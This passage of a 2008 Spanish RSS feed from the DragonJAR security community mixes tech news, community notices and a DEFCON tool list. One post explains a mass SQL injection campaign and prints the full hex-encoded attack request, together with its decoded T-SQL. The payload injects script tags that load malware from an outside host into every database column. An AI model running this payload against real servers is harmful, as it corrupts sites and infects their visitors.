<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet href="http://feeds.feedburner.com/~d/styles/rss2full.xsl" type="text/xsl" media="screen"?><?xml-stylesheet href="http://feeds.feedburner.com/~d/styles/itemcontent.css" type="text/css" media="screen"?><rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0">

<channel>
	<title>La Comunidad DragonJAR</title>
	
	<link>http://www.dragonjar.org</link>
	<description>Noticias de actualidad y seguridad informática, herramientas de seguridad, documentación y una excelente COMUNIDAD.</description>
	<pubDate>Thu, 21 Aug 2008 05:46:14 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.6.1</generator>
	<language>en</language>
			<atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" href="http://feeds.feedburner.com/Emula2" type="application/rss+xml" /><item>
		<title>Otros 100 Millones para Novell de parte de Microsoft</title>
		<link>http://feeds.feedburner.com/~r/Emula2/~3/370695855/otros-100-millones-para-novell-de-parte-de-microsoft.xhtml</link>
		<comments>http://www.dragonjar.org/otros-100-millones-para-novell-de-parte-de-microsoft.xhtml#comments</comments>
		<pubDate>Thu, 21 Aug 2008 05:43:36 +0000</pubDate>
		<dc:creator>Cronopio</dc:creator>
		
		<category><![CDATA[Legislación y Ética]]></category>

		<category><![CDATA[Noticias Software]]></category>

		<category><![CDATA[Microsoft]]></category>

		<category><![CDATA[Novell]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=875</guid>
		<description><![CDATA[
Desde que Novell firmó un convenio con Microsoft se levantó en la red una sombra de dudas alimentada por saber el verdadero interés de Microsoft por ser aliado de Novell, muchas especulaciones se han dado pero lo que si es seguro, es que el dinero se ha movido y eso es lo que le interesa [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><a href="http://imageshack.us"><img class="aligncenter" src="http://img239.imageshack.us/img239/5486/610xwd2.jpg" border="0" alt="Image Hosted by ImageShack.us" /></a></p>
<p>Desde que Novell firmó un convenio con Microsoft se levantó en la red una sombra de dudas alimentada por saber el verdadero interés de Microsoft por ser aliado de Novell, muchas especulaciones se han dado pero lo que si es seguro, es que el dinero se ha movido y eso es lo que le interesa a los dos CEOs de estas grandes compañías.</p>
<p>Ahora después de varios meses de firmado el acuerdo de cooperación, Microsoft ha anunciado que el próximo 1 de noviembre pagará 100 millones de dólares a Novell por concepto de cuotas adicionales por suscripción esto quiere decir que los clientes de Microsoft están interesados en seguir adquiriendo los diferentes productos <em>Open Source</em> de Novell y además es mas dinero para seguir invirtiendo en el plan de integración de tecnologías que llevan a cabo estas compañías para beneficio de sus propios clientes.</p>
<p><span id="more-875"></span></p>
<p>De esta manera Novell sigue ganando (hasta ahora ha recibido 175 millones) y haciendo controversia por aceptar la cláusula del acuerdo que decía que ninguna parte demandaría a la otra o a sus clientes por cuestión de patentes, mostrando una posición contraria frente a la comunidad que siempre a visto el uso &#8220;comercial&#8221; de desarrollos que no se han hecho con fines comerciales.</p>
<p>Microsoft se ve comercialmente presionada por sus clientes para que sus productos sean tecnológicamente inter operables con soluciones de código abierto, su asociación con Novell les permite estar mas fuertes ante otras opciones del mercado.</p>
<img src="http://feeds.feedburner.com/~r/Emula2/~4/370695855" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/otros-100-millones-para-novell-de-parte-de-microsoft.xhtml/feed</wfw:commentRss>
		<feedburner:origLink>http://www.dragonjar.org/otros-100-millones-para-novell-de-parte-de-microsoft.xhtml</feedburner:origLink></item>
		<item>
		<title>Nuevo Editor</title>
		<link>http://feeds.feedburner.com/~r/Emula2/~3/370695856/nuevo-editor.xhtml</link>
		<comments>http://www.dragonjar.org/nuevo-editor.xhtml#comments</comments>
		<pubDate>Thu, 21 Aug 2008 05:41:01 +0000</pubDate>
		<dc:creator>Cronopio</dc:creator>
		
		<category><![CDATA[General]]></category>

		<category><![CDATA[Avisos]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=878</guid>
		<description><![CDATA[Saludos a todos los fieles lectores de esta comunidad!!
Soy Cronopio y estaré escribiendo un poco para ustedes, espero tratar temas interesantes y estar actualizado.
Me considero un pequeño hacktivista del Software Libre perteneciente al grupo PULPA de la UTP. Desde hace unos años Debian se apodero de mi computador y mi cabeza, pienso cosas muy diferentes [...]]]></description>
			<content:encoded><![CDATA[<p>Saludos a todos los fieles lectores de esta comunidad!!</p>
<p>Soy Cronopio y estaré escribiendo un poco para ustedes, espero tratar temas interesantes y estar actualizado.</p>
<p>Me considero un pequeño <a href="http://es.wikipedia.org/wiki/Hacktivismo">hacktivista</a> del Software Libre perteneciente al grupo <a href="http://pulpa.utp.edu.co">PULPA</a> de la <a href="http://www.utp.edu.co">UTP</a>. Desde hace unos años <a href="http://www.debian.org">Debian</a> se apodero de mi computador y mi cabeza, pienso cosas muy diferentes a todos pero estoy convencido que si piensas diferente entonces no estas solo.</p>
<p>Desde el primer congreso de seguridad en manizales en el 2004 ví que habian muchas personas como yo en este medio, <strong>interesados en aprender</strong>. Ahora muchos amigos que tengo son debido a eso y he aprendido junto a ellos y también de ellos. Espero seguir incursionando en este mundo y estaré abierto a cualquier comentario.</p>
<img src="http://feeds.feedburner.com/~r/Emula2/~4/370695856" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/nuevo-editor.xhtml/feed</wfw:commentRss>
		<feedburner:origLink>http://www.dragonjar.org/nuevo-editor.xhtml</feedburner:origLink></item>
		<item>
		<title>Herramientas de Seguridad Lanzadas en DEFCON</title>
		<link>http://feeds.feedburner.com/~r/Emula2/~3/370398209/herramientas-de-seguridad-lanzadas-en-defcon.xhtml</link>
		<comments>http://www.dragonjar.org/herramientas-de-seguridad-lanzadas-en-defcon.xhtml#comments</comments>
		<pubDate>Wed, 20 Aug 2008 17:36:37 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
		
		<category><![CDATA[Herramientas Seguridad]]></category>

		<category><![CDATA[DEFCON]]></category>

		<category><![CDATA[Liberadas]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=871</guid>
		<description><![CDATA[
A continuacion les dejo un listado de herramientas de seguridad lanzadas en la reunión de hackers “DEFCON 16” en la Vegas
Beholder – by Nelson Murilo and Luis Eduardo
# Descripción: An open source wireless IDS program
# Pagina: http://www.beholderwireless.org/
# Correo: bh@beholderwireless.org
The Middler – by Jay Beale
# Descripción: The end-all be-all of MITM tools
# Pagina: http://www.themiddler.com/ (Online?)
# Preface [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><img class="aligncenter" src="http://img398.imageshack.us/img398/2393/defconlogoposticonsa7.gif" alt="DEFCON Herramientas de Seguridad" /></p>
<p>A continuacion les dejo un listado de herramientas de seguridad lanzadas en la reunión de hackers “DEFCON 16” en la Vegas</p>
<p>Beholder – by Nelson Murilo and Luis Eduardo<br />
# Descripción: An open source wireless IDS program<br />
# Pagina: <a href="http://www.beholderwireless.org/" target="_blank">http://www.beholderwireless.org/</a><br />
# Correo: <a href="mailto:bh@beholderwireless.org">bh@beholderwireless.org</a></p>
<p>The Middler – by Jay Beale<br />
# Descripción: The end-all be-all of MITM tools<br />
# Pagina: <a href="http://www.themiddler.com/" target="_blank">http://www.themiddler.com/</a> (Online?)<br />
# Preface Link: <a href="http://www.intelguardians.com/themiddler.html" target="_blank">http://www.intelguardians.com/themiddler.html</a></p>
<p>ClientIPS – by Jay Beale<br />
# Descripción: An open source inline “transparent” client-side IPS<br />
# Pagina: <a href="http://www.clientips.org/" target="_blank">http://www.ClientIPS.org/</a> (Online?)</p>
<p>Marathon Tool – by Daniel Kachakill<br />
# Descripción: A Blind SQL Injection tool based on heavy queries<br />
# Download Link: DEFCON 16 CD. No online link found.<br />
# Correo: <a href="mailto:dani@kachakil.com">dani@kachakil.com</a></p>
<p><span id="more-871"></span>The Phantom Protocol – by Magnus Brading<br />
# Descripción: A Tor-like protocol that fixes some of Tor’s major attack vectors<br />
# Pagina: <a href="http://code.google.com/p/phantom" target="_blank">http://code.google.com/p/phantom</a><br />
# Correo: <a href="mailto:brading@fortego.se">brading@fortego.se</a></p>
<p>ModScan – by Mark Bristow<br />
# Descripción: A SCADA Modbus Network Scanner<br />
# Pagina: <a href="http://modscan.googlecode.com/" target="_blank">http://modscan.googlecode.com/</a><br />
# Correo: <a href="mailto:mark.bristow@gmail.com">mark.bristow@gmail.com</a></p>
<p>Grendel Scan – by David Byrne<br />
# Descripción: Web Application scanner that searches for logic and design flaws as well as the standard flaw seen in the wild today (SQL Injection, XSS, CSRF)<br />
# Pagina: <a href="http://grendel-scan.com/" target="_blank">http://grendel-scan.com/</a></p>
<p>iKat – interactive Kiosk Attack Tool (This site has an image as a banner that is definitely not safe for work! – You have been warned) by Paul Craig<br />
# Descripción: A web site that is dedicated to helping you break out of Kiosk jails<br />
# Pagina: <a href="http://ikat.ha.cked.net/" target="_blank">http://ikat.ha.cked.net</a><br />
# Correo: <a href="mailto:paul.craig@security-assessment.com">paul.craig@security-assessment.com</a></p>
<p>DAVIX – by Jan P. Monsch and Raffael Marty<br />
# Descripción: A SLAX based Linux Distro that is geared toward data/log visualization<br />
# Pagina: <a href="http://code.google.com/p/davix/" target="_blank">http://code.google.com/p/davix/</a><br />
# Download Link: <a href="http://www.geekceo.com/davix/davix-0.5.0.iso.gz" target="_blank">http://www.geekceo.com/davix/davix-0.5.0.iso.gz</a><br />
# Correo: <a href="mailto:jan.monsch@iplosion.com">jan.monsch@iplosion.com</a> and <a href="mailto:raffy@secviz.org">raffy@secviz.org</a></p>
<p>CollabREate – by Chris Eagle and Tim Vidas<br />
# Descripción: An IDA Pro plugin with a server backend that allows multiple people to collaborate on a single RE (reverse engineering) project.<br />
# Pagina: <a href="http://www.idabook.com/defcon" target="_blank">http://www.idabook.com/defcon</a><br />
# Correo: <a href="mailto:cseagle@gmail.com">cseagle@gmail.com</a> and <a href="mailto:tvidas@gmail.com">tvidas@gmail.com</a></p>
<p>Dradis – by John Fitzpatrick<br />
# Descripción: A tool for organizing and sharing information during a penetration test<br />
# Pagina: <a href="http://dradis.sourceforge.net/" target="_blank">http://dradis.sourceforge.net</a><br />
# Correo: <a href="mailto:john.fitzpatrick@mwrinfosecurity.com">john.fitzpatrick@mwrinfosecurity.com</a></p>
<p>Squirtle – by Kurt Grutzmacher<br />
# Descripción: A Rouge Server with Controlling Desires that steals NTLM hashes.<br />
# Pagina: <a href="http://code.google.com/p/squirtle" target="_blank">http://code.google.com/p/squirtle</a> (Live?)<br />
# Correo: <a href="mailto:grutz@jingojango.net">grutz@jingojango.net</a></p>
<p>WhiteSpace – by Kolisar<br />
# Descripción: A script that can hide other scripts such as CSRF and iframes in spaces and tabs<br />
# Download Link: DEFCON 16 CD</p>
<p>VoIPer – by nnp<br />
# Descripción: VoIP automated fuzzing tool with support for a large number of VoIP applications and protocols<br />
# Pagina: <a href="http://voiper.sourceforge.net/" target="_blank">http://voiper.sourceforge.net/</a></p>
<p>Barrier – by Errata Security<br />
# Descripción: A browser plugin that pen-tests every site that you visit.<br />
# Pagina: <a href="http://www.erratasec.com/" target="_blank">http://www.erratasec.com</a><br />
# Correo: <a href="mailto:sales@erratasec.com">sales@erratasec.com</a></p>
<p>Psyche – by Ponte Technologies<br />
# Descripción: An advanced network flow visualization tool that is not soley based on time.<br />
# Pagina: <a href="http://psyche.pontetec.com/" target="_blank">http://psyche.pontetec.com/</a></p>
<p>Escrito por <strong><a title="Ver perfil de AR-TECH" href="http://comunidad.dragonjar.org/index.php?action=profile;u=15">AR-TECH</a></strong> en <a href="http://comunidad.dragonjar.org/index.php?topic=339.msg887#msg887">Herramientas de seguridad lanzada en DefCon 16 en las Vegas</a></p>
<img src="http://feeds.feedburner.com/~r/Emula2/~4/370398209" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/herramientas-de-seguridad-lanzadas-en-defcon.xhtml/feed</wfw:commentRss>
		<feedburner:origLink>http://www.dragonjar.org/herramientas-de-seguridad-lanzadas-en-defcon.xhtml</feedburner:origLink></item>
		<item>
		<title>Convocatoria Ezine DragonJAR # 3</title>
		<link>http://feeds.feedburner.com/~r/Emula2/~3/368824731/convocatoria-ezine-dragonjar-3.xhtml</link>
		<comments>http://www.dragonjar.org/convocatoria-ezine-dragonjar-3.xhtml#comments</comments>
		<pubDate>Tue, 19 Aug 2008 01:07:42 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
		
		<category><![CDATA[Proyectos]]></category>

		<category><![CDATA[La Comunidad DragonJAR]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=824</guid>
		<description><![CDATA[Desde hace  largo tiempo algunos usuarios trabajamos muy duro y de forma constante para que este proyecto,  el cual en muchas ocasiones, se quedo solo en palabras,  saliera adelante.
Allí fue cuando  salió La Ezine DragonJAR #1, esta,  tuvo mucha acogida en toda la red, y fue descargada más de 3300 veces, obviamente tenía errores por [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Desde hace  largo tiempo algunos usuarios trabajamos muy duro y de forma constante para que este proyecto,  el cual en muchas ocasiones, se quedo solo en palabras,  saliera adelante.</p>
<p>Allí fue cuando  salió La Ezine DragonJAR #1, esta,  tuvo mucha acogida en toda la red, y fue descargada más de 3300 veces, obviamente tenía errores por que era nuestro primer paso en el mundo de las revistas electrónicas.</p>
<p>Despues de este &#8220;éxito&#8221; por decirlo así, muchos usuarios de la comunidad, e incluso los admin, se  unieron a este bonito proyecto, y  como había tanto material se hizo un concurso para que personas expertas calificaran los artículos más valiosos y estos serían premiados con una USB. Después de esto sale  este número de la revista, con un poco más de seriedad, y con contenidos filtrados por personas expertas, que se podía decir  de forma clara que eran los mejores artículos  de nuestra comunidad. Este número también se ha bajado mas de 1000 veces,  en muy poco tiempo.</p>
<p style="text-align: justify;"><span id="more-824"></span>Ahora es nuestro derecho sacar la mejor  revista digital de nuestra comunidad, por varias razones. La primera es para demostrar que nuestra comunidad no ha muerto, por el contrario ha surgido con mucha más fuerza. La segunda es  por que ya estamos organizados y tenemos un excelente grupo de trabajo. La tercera es por que  se corregirán todos los errores de números anteriores.</p>
<p>Es por estas razones y muchas más que quiero INVITAR A TODOS LOS USUARIOS DE LA COMUNIDAD DRAGONJAR a que se unan  a este grandioso proyecto escribiendo sus artículos y  que compartan todos sus conocimientos. Como todos saben la comunidad se enfoca hacia la seguridad informática, es por esto  que los artículos deben ser de este tipo, algo muy importante es que deben ser artículos propios, ya que debemos ser auténticos. Se recojeran articulos hasta el día 20 de septiembre y cualquier usuario puede participar, pueden enviar  los  articulos al correo <strong>epsilon77@gmail.com</strong> allí los leeremos y los editaremos.</p>
<p>Espero que  mucha gente nos apoye y mande su artículo, este debe ser en formato texto y  si trae imágenes estas deben ser anexadas. Necesitamos calidad y conocimiento y  estoy seguro que eso sobra en nuestra comunidad.</p>
<p>Gracias por la atención<br />
saludos</p>
<p>Att:Epsilon<br />
Director Ezine Comunidad DragonJAR<br />
epsilon77@gmail.com<br />
<a href="www.epsilonblog.net" target="_blank">www.epsilonblog.net</a></p>
<img src="http://feeds.feedburner.com/~r/Emula2/~4/368824731" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/convocatoria-ezine-dragonjar-3.xhtml/feed</wfw:commentRss>
		<feedburner:origLink>http://www.dragonjar.org/convocatoria-ezine-dragonjar-3.xhtml</feedburner:origLink></item>
		<item>
		<title>Nuevo ataque de Inyeccion de SQL esta comprometiendo maquinas</title>
		<link>http://feeds.feedburner.com/~r/Emula2/~3/368824732/nuevo-ataque-de-inyeccion-de-sql-esta-comprometiendo-maquinas.xhtml</link>
		<comments>http://www.dragonjar.org/nuevo-ataque-de-inyeccion-de-sql-esta-comprometiendo-maquinas.xhtml#comments</comments>
		<pubDate>Wed, 13 Aug 2008 12:35:21 +0000</pubDate>
		<dc:creator>arpunk</dc:creator>
		
		<category><![CDATA[Noticias Seguridad]]></category>

		<category><![CDATA[Injection]]></category>

		<category><![CDATA[SQL]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=201</guid>
		<description><![CDATA[
Un nuevo ataque de inyección de SQL ha venido circulando la semana pasada, y parece que ha infectado algunos cientos de servidores web en la tarde del viernes pasado. Los ataques se ven similares al que se muestra a continuación, e intentan consultar por archivos aleatorios validos en el servidor web.
Las tablas de sysobjects y [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><img class="aligncenter" src="http://img214.imageshack.us/img214/7079/5180537378a9794389erq7.jpg" alt="Inyeccion SQL - SQL Injection" /></p>
<p>Un nuevo ataque de inyección de SQL ha venido circulando la semana pasada, y parece que ha infectado algunos cientos de servidores web en la tarde del viernes pasado. Los ataques se ven similares al que se muestra a continuación, e intentan consultar por archivos aleatorios validos en el servidor web.</p>
<p>Las tablas de sysobjects y syscolumns son consultadas y esto nos da una muy buena pista: las maquinas que se están atacando corren MSSQL, y se esta guardando código HTML dentro de la base de datos. También es posible que los servidores web con Sybase database backends sean explotables, ya que Sybase utiliza de manera muy amplia la misma sintaxis y estructura de las tablas que MSSQL server.<span id="more-201"></span></p>
<p>La sentencia SQL escanea todas las tablas de la base de datos, insertando el código HTML del atacante en cada una de las paginas. Esto causa que el servidor web envié a los visitantes, dependiendo de su cliente web, a diferentes formas de malware que se aloja en paginas referenciadas<br />
por el código HTML maligno. Similar al phishing, este ataque toma ventaja de que el visitante del sitio web confía en el sitio que están visitando. En vez de suplantar la identidad del sitio confiado, el sitio confiado es aquel que le envía el malware al cliente, quien tiene mayores probabilidades de aceptar.</p>
<p>Este tipo de ataque puede ser usado para lanzar ataques de phishing tradicionales en sitios que solicitan información financiera, o cualquier otro tipo de ataque en donde la confianza de los visitantes pueda ser explotada.</p>
<p>Los requests que saldrían en los logs del web server se asemejan al siguiente:</p>
<p>GET /?&#8217;;DECLARE%20@S%20CHAR(4000);SET%20@<br />
S=CAST(0&#215;4445434C41524520405420766172636<br />
8617228323535292C40432076617263686172283<br />
430303029204445434C415245205461626C655F4<br />
37572736F7220435552534F5220464F522073656<br />
C65637420612E6E616D652C622E6E616D6520667<br />
26F6D207379736F626A6563747320612C7379736<br />
36F6C756D6E73206220776865726520612E69643<br />
D622E696420616E6420612E78747970653D27752<br />
720616E642028622E78747970653D3939206F722<br />
0622E78747970653D3335206F7220622E7874797<br />
0653D323331206F7220622E78747970653D31363<br />
729204F50454E205461626C655F437572736F722<br />
04645544348204E4558542046524F4D202054616<br />
26C655F437572736F7220494E544F2040542C404<br />
3205748494C4528404046455443485F535441545<br />
5533D302920424547494E2065786563282775706<br />
4617465205B272B40542B275D20736574205B272<br />
B40432B275D3D5B272B40432B275D2B2727223E3<br />
C2F7469746C653E3C736372697074207372633D2<br />
2687474703A2F2F73646F2E313030306D672E636<br />
E2F63737273732F772E6A73223E3C2F736372697<br />
0743E3C212D2D272720776865726520272B40432<br />
B27206E6F74206C696B6520272725223E3C2F746<br />
9746C653E3C736372697074207372633D2268747<br />
4703A2F2F73646F2E313030306D672E636E2F637<br />
37273732F772E6A73223E3C2F7363726970743E3<br />
C212D2D272727294645544348204E45585420465<br />
24F4D20205461626C655F437572736F7220494E5<br />
44F2040542C404320454E4420434C4F534520546<br />
1626C655F437572736F72204445414C4C4F43415<br />
445205461626C655F437572736F72%20AS%20CHA<br />
R(4000));EXEC(@S);HTTP/1.1</p>
<p>Esta salida decodificada nos muestra la siguiente sentencia SQL (URLs han sido removidas):</p>
<p>DECLARE @T varchar(255), @C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name, b.name from sysobjects a, syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec(’update ['+@T+'] set ['+@C +']=['+@C+']+””&gt;<script src="”http://www.domain.com/malware/"></script><!--–” where ‘+@C+’ not like ”%”--><script src="”http://www.domain.com/malware/w.js"></script><!--–”’)FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor</p-->
<p>Este ataque todavía sigue en funcionamiento hasta el día de hoy. Se ha obtenido evidencia de explotación satisfactoria a través de cientos de paginas web. Estas paginas estaban asociadas con otras paginas al rededor del mundo suplantando contenido (incluyendo sitios de gobierno, sitios de venta por Internet, sitios de información financiera, entre otros).</p>
<img src="http://feeds.feedburner.com/~r/Emula2/~4/368824732" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/nuevo-ataque-de-inyeccion-de-sql-esta-comprometiendo-maquinas.xhtml/feed</wfw:commentRss>
		<feedburner:origLink>http://www.dragonjar.org/nuevo-ataque-de-inyeccion-de-sql-esta-comprometiendo-maquinas.xhtml</feedburner:origLink></item>
		<item>
		<title>Memorias y registro del Seminario de Seguridad Informática en Popayán</title>
		<link>http://feeds.feedburner.com/~r/Emula2/~3/368824733/memorias-y-registro-del-seminario-de-seguridad-informatica-en-popayan.xhtml</link>
		<comments>http://www.dragonjar.org/memorias-y-registro-del-seminario-de-seguridad-informatica-en-popayan.xhtml#comments</comments>
		<pubDate>Wed, 13 Aug 2008 01:21:56 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
		
		<category><![CDATA[Eventos en seguridad]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=225</guid>
		<description><![CDATA[No queda más que dar las gracias al grupo organizador de este magnífico evento, especialmente a Diego Salazar y Ervin andrade, por la atención tan especial que nos brindaron a todos los ponentes y participantes de la Comunidad DragonJAR.

Todos salimos muy contentos, y ninguno quería volver a casa, y es que todos los días había [...]]]></description>
			<content:encoded><![CDATA[<p>No queda más que dar las gracias al grupo organizador de este magnífico evento, especialmente a Diego Salazar y Ervin andrade, por la atención tan especial que nos brindaron a todos los ponentes y participantes de la Comunidad DragonJAR.</p>
<p><a href="http://img295.imageshack.us/img295/6694/comunidadeb2.jpg"><img src="http://img295.imageshack.us/img295/6694/comunidadeb2.jpg" border="0"/></a></p>
<p>Todos salimos muy contentos, y ninguno quería volver a casa, y es que todos los días había un programa al cual estamos cordialmente invitados.</p>
<p>Ya se ha habilitado un post en el foro, para comentar y publicar recursos relacionados con este evento. Así que bienvenidos a participar. </p>
<p><a href="http://comunidad.dragonjar.org/index.php?topic=57.0" target="_blank"><strong>Ingresar al Post con el registro fotográfico del evento</strong></a></p>
<img src="http://feeds.feedburner.com/~r/Emula2/~4/368824733" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/memorias-y-registro-del-seminario-de-seguridad-informatica-en-popayan.xhtml/feed</wfw:commentRss>
		<feedburner:origLink>http://www.dragonjar.org/memorias-y-registro-del-seminario-de-seguridad-informatica-en-popayan.xhtml</feedburner:origLink></item>
		<item>
		<title>Descarga Gratis ZoneAlarm ForceField</title>
		<link>http://feeds.feedburner.com/~r/Emula2/~3/368824734/descarga-gratis-zonealarm-forcefield.xhtml</link>
		<comments>http://www.dragonjar.org/descarga-gratis-zonealarm-forcefield.xhtml#comments</comments>
		<pubDate>Tue, 12 Aug 2008 19:58:51 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
		
		<category><![CDATA[General]]></category>

		<category><![CDATA[ForceFiel]]></category>

		<category><![CDATA[Gratis]]></category>

		<category><![CDATA[ZoneAlarm]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=183</guid>
		<description><![CDATA[
ZoneAlarm, empresa bien conocida por su Firewall, ha permitido la descarga gratis de su software ForceField, una aplicación que permite aislar el navegador del resto del ordenador, de forma que las acciones de este no afecten a nuestro sistema, cuando cerremos el navegador desaparecen los archivos temporales, descargas, historial, además se añade un antispyware y [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><a href="http://download.zonealarm.com/bin/free/sum/index.html"><img class="aligncenter" src="http://img514.imageshack.us/img514/2954/zonealarmgn8.jpg" alt="ZoneAlarm Gratis" /></a></p>
<p>ZoneAlarm, empresa bien conocida por su Firewall, ha permitido la descarga gratis de su software ForceField, una aplicación que permite aislar el navegador del resto del ordenador, de forma que las acciones de este no afecten a nuestro sistema, cuando cerremos el navegador desaparecen los archivos temporales, descargas, historial, además se añade un antispyware y tecnología antiphishing.</p>
<p style="text-align: center;"><a href="http://download.zonealarm.com/bin/free/sum/index.html"><strong>SOLO POR HOY 12 DE AGOSTO</strong> ES POSIBLE DESCARGAR ESTE SOFTWARE TOTALMENTE GRATIS CON UNA LICENCIA DE 1 AÑO</a></p>
<p>Das click en el botón <img src="https://sc1.checkpoint.com/za/images/sum/get_license_btn.gif" border="0" alt="get free license" />, pones tus datos y a tu correo te llegara un enlace de descarga y la licencia correspondiente por 1 año, si quieres el software en español puedes <a href="http://download.zonealarm.com/bin/free/3401_es/zaasSetup_70_483_000_es.exe">bajarlo de aquí</a> y utilizar el serial que te enviaron.</p>
<p>Gracias a <strong><a title="Ver perfil de GeeKFouR" href="http://comunidad.dragonjar.org/index.php?action=profile;u=47">GeeKFouR</a></strong> en el <a href="http://comunidad.dragonjar.org/index.php?topic=83.msg119">foro</a> por el dato.</p>
<img src="http://feeds.feedburner.com/~r/Emula2/~4/368824734" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/descarga-gratis-zonealarm-forcefield.xhtml/feed</wfw:commentRss>
		<feedburner:origLink>http://www.dragonjar.org/descarga-gratis-zonealarm-forcefield.xhtml</feedburner:origLink></item>
		<item>
		<title>Anuncio</title>
		<link>http://feeds.feedburner.com/~r/Emula2/~3/368824735/anuncio.xhtml</link>
		<comments>http://www.dragonjar.org/anuncio.xhtml#comments</comments>
		<pubDate>Mon, 11 Aug 2008 21:07:11 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
		
		<category><![CDATA[General]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3</guid>
		<description><![CDATA[Comunidad y visitantes. Pedimos disculpas por la interrupción de nuestros servicios. Actualmente tenemos algunos eventos con el servidor Web. Ya estamos trabajando en ello, para ofrecer una mejor comunidad totalmente renovada y llena de sorpresas.
Gracias por su comprensión&#8230;
]]></description>
			<content:encoded><![CDATA[<p>Comunidad y visitantes. Pedimos disculpas por la interrupción de nuestros servicios. Actualmente tenemos algunos eventos con el servidor Web. Ya estamos trabajando en ello, para ofrecer una mejor comunidad totalmente renovada y llena de sorpresas.</p>
<p>Gracias por su comprensión&#8230;</p>
<img src="http://feeds.feedburner.com/~r/Emula2/~4/368824735" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/anuncio.xhtml/feed</wfw:commentRss>
		<feedburner:origLink>http://www.dragonjar.org/anuncio.xhtml</feedburner:origLink></item>
		<item>
		<title>Incrementa el uso militar de robots.</title>
		<link>http://feeds.feedburner.com/~r/Emula2/~3/368824736/incrementa-el-uso-militar-de-robots.xhtml</link>
		<comments>http://www.dragonjar.org/incrementa-el-uso-militar-de-robots.xhtml#comments</comments>
		<pubDate>Wed, 06 Aug 2008 04:10:07 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
		
		<category><![CDATA[Noticias Hardware]]></category>

		<category><![CDATA[Militar]]></category>

		<category><![CDATA[Robots]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=71</guid>
		<description><![CDATA[
Las bajas que producen las guerras por lo general son escondidas de la prensa y los medios de manera muy celosa, pero eso quedo en el pasado gracias a la corporación iRobot con su soldado Packbot.
Los robots en el campo militar ya no son cuentos de ciencia ficción. Estos han dejado las pantallas de los [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><img src="http://img521.imageshack.us/img521/8889/irobotfs0.jpg" alt="Robots Militares" /></p>
<p>Las bajas que producen las guerras por lo general son escondidas de la prensa y los medios de manera muy celosa, pero eso quedo en el pasado gracias a la corporación iRobot con su soldado Packbot.</p>
<p>Los robots en el campo militar ya no son cuentos de ciencia ficción. Estos han dejado las pantallas de los cines y han entrado a un verdadero campo de batalla. Doug Few y Bill Smart (buen apellido) de la universidad de St. Louis, Washington, trabajan con tecnología de punta en cuanto a robotica se refiere. Few y Smart dicen que uno de los objetivos de los militares es tener su armada compuesta de al menos un 30% de robots para el 2020. Obviamente, por ahora, no se esta visionando robots como los vemos en la guerra de las galaxias, “yo, robot” o terminator.<span id="more-71"></span></p>
<p>Cuando se habla de robots, se refieren a todo desde camiones que se conducen solos hasta donde nosotros conocemos convencionalmente como robots. La mejor palabra para describirlo serian “sistemas autónomos” en vez de robots, afirma el asistente del profesor Smart (un profesor de ciencias de la computación e ingeniería).</p>
<p>Toda la fuerza de robots de la armada es teleoperada, lo cual significa que existe una persona real operando el robot desde una locación remota utilizando un joystick y un computador. Esto puede ser visto como una desventaja en la adición de robots a las fuerzas armadas, es muy importante mantener humanos que estén involucrados en las operaciones que realiza el robot.</p>
<p>“Es cuestión de seguir la linea de comando. No querrás darle autonomía a un sistema armado. En vez de eso, querrás tener un humano que oprima el botón.”, dice Smart, argumentando lo importante que es tener a un humano tomando todas las decisiones importantes.</p>
<p>Por ahora no tenemos problemas con los robots, de hecho muchos ya los estamos esperando. Sin embargo, existe el miedo argumentado de la verdadera utilidad de los robots en el campo de batalla. Si, seguramente podremos salvar muchas vidas, ¿pero a que costo?.</p>
